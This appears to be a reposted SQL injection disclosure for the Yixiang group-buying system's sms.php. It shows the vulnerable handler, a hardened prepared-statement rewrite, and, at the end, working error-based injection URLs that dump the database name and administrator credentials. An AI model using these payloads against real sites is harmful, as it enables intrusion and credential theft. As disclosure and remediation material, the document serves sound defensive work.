First published at: http://club.freebuf.com/?/question/416
by 0x53sec http://www.freebuf.com/author/0x53sec
Several variables in the sms.php file of 易想团购系统 (Yixiang group-buying system) are not filtered strictly enough, which leads to a SQL injection vulnerability. Partial code:
    elseif($_REQUEST['act']=='do_unsubscribe_verify')
    {
        $code = trim($_REQUEST['code']);
        $mobile = trim($_REQUEST['mobile']);
        // Both $mobile and $code are only stripped of surrounding whitespace by trim() and are then
        // concatenated directly into the SQL string, which is what makes the SQL injection possible.
        $mobile_item = $GLOBALS['db']->getRow("select * from ".DB_PREFIX."mobile_list where mobile = '".$mobile."' and verify_code = '".$code."'");
        if($mobile_item)
        {
            $GLOBALS['db']->query("delete from ".DB_PREFIX."mobile_list where id = ".$mobile_item['id']);
            $result['type'] = 1;
            ajax_return($result);
        }
        else
        {
            $result['type'] = 0;
            $result['message'] = $GLOBALS['lang']['VERIFY_CODE_ERROR'];
            ajax_return($result);
        }
    }
    ?>
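A hardened version of the same handler, added here as an example and not the project's own code: it assumes a PDO connection ($pdo) and takes the table prefix as a parameter instead of using the original $GLOBALS['db'] wrapper and DB_PREFIX constant. User input is validated by shape and then bound as a parameter, so it can never change the structure of the query.

```php
<?php
// Added example, not the Yixiang code base: hardened do_unsubscribe_verify handler.
// Assumptions: $pdo is a PDO connection; $prefix is the trusted table prefix
// (the value of DB_PREFIX), never user-controlled.
function do_unsubscribe_verify(PDO $pdo, string $prefix, array $request): array
{
    $code   = trim((string) ($request['code'] ?? ''));
    $mobile = trim((string) ($request['mobile'] ?? ''));

    // Shape check before the database is touched. The patterns are constructed
    // for this example (digit-only mobile, alphanumeric code, bounded length);
    // adjust them to whatever the application actually issues.
    if (!preg_match('/^\d{6,20}$/', $mobile) || !preg_match('/^[A-Za-z0-9]{4,12}$/', $code)) {
        return ['type' => 0, 'message' => 'VERIFY_CODE_ERROR'];
    }

    // Prepared statement: $mobile and $code are sent as bound data, not spliced
    // into the SQL text, so quotes, comment markers and subselects in the input
    // are compared literally against the column values instead of being executed.
    $stmt = $pdo->prepare(
        "SELECT id FROM {$prefix}mobile_list WHERE mobile = :mobile AND verify_code = :code"
    );
    $stmt->execute([':mobile' => $mobile, ':code' => $code]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    if (!$row) {
        return ['type' => 0, 'message' => 'VERIFY_CODE_ERROR'];
    }

    // The id comes from the database, but it is still bound rather than concatenated.
    $del = $pdo->prepare("DELETE FROM {$prefix}mobile_list WHERE id = :id");
    $del->execute([':id' => (int) $row['id']]);

    return ['type' => 1];
}
```

The caller would wrap the returned array with ajax_return() exactly as the original branch does; only the query construction changes.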
Exploit:
/sms.php?act=do_unsubscribe_verify&code='%20and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
Retrieving the administrator account and password:
/sms.php?act=do_unsubscribe_verify&code='and (updatexml(1,concat(0x3a,(select concat(adm_name,0x3a,adm_password) from easethink_admin limit 1)),1))%23
With a changed table prefix:
/sms.php?act=do_unsubscribe_verify&code='and (updatexml(1,concat(0x3a,(select concat(adm_name,0x3a,adm_password) from esjj_admin limit 1)),1))%23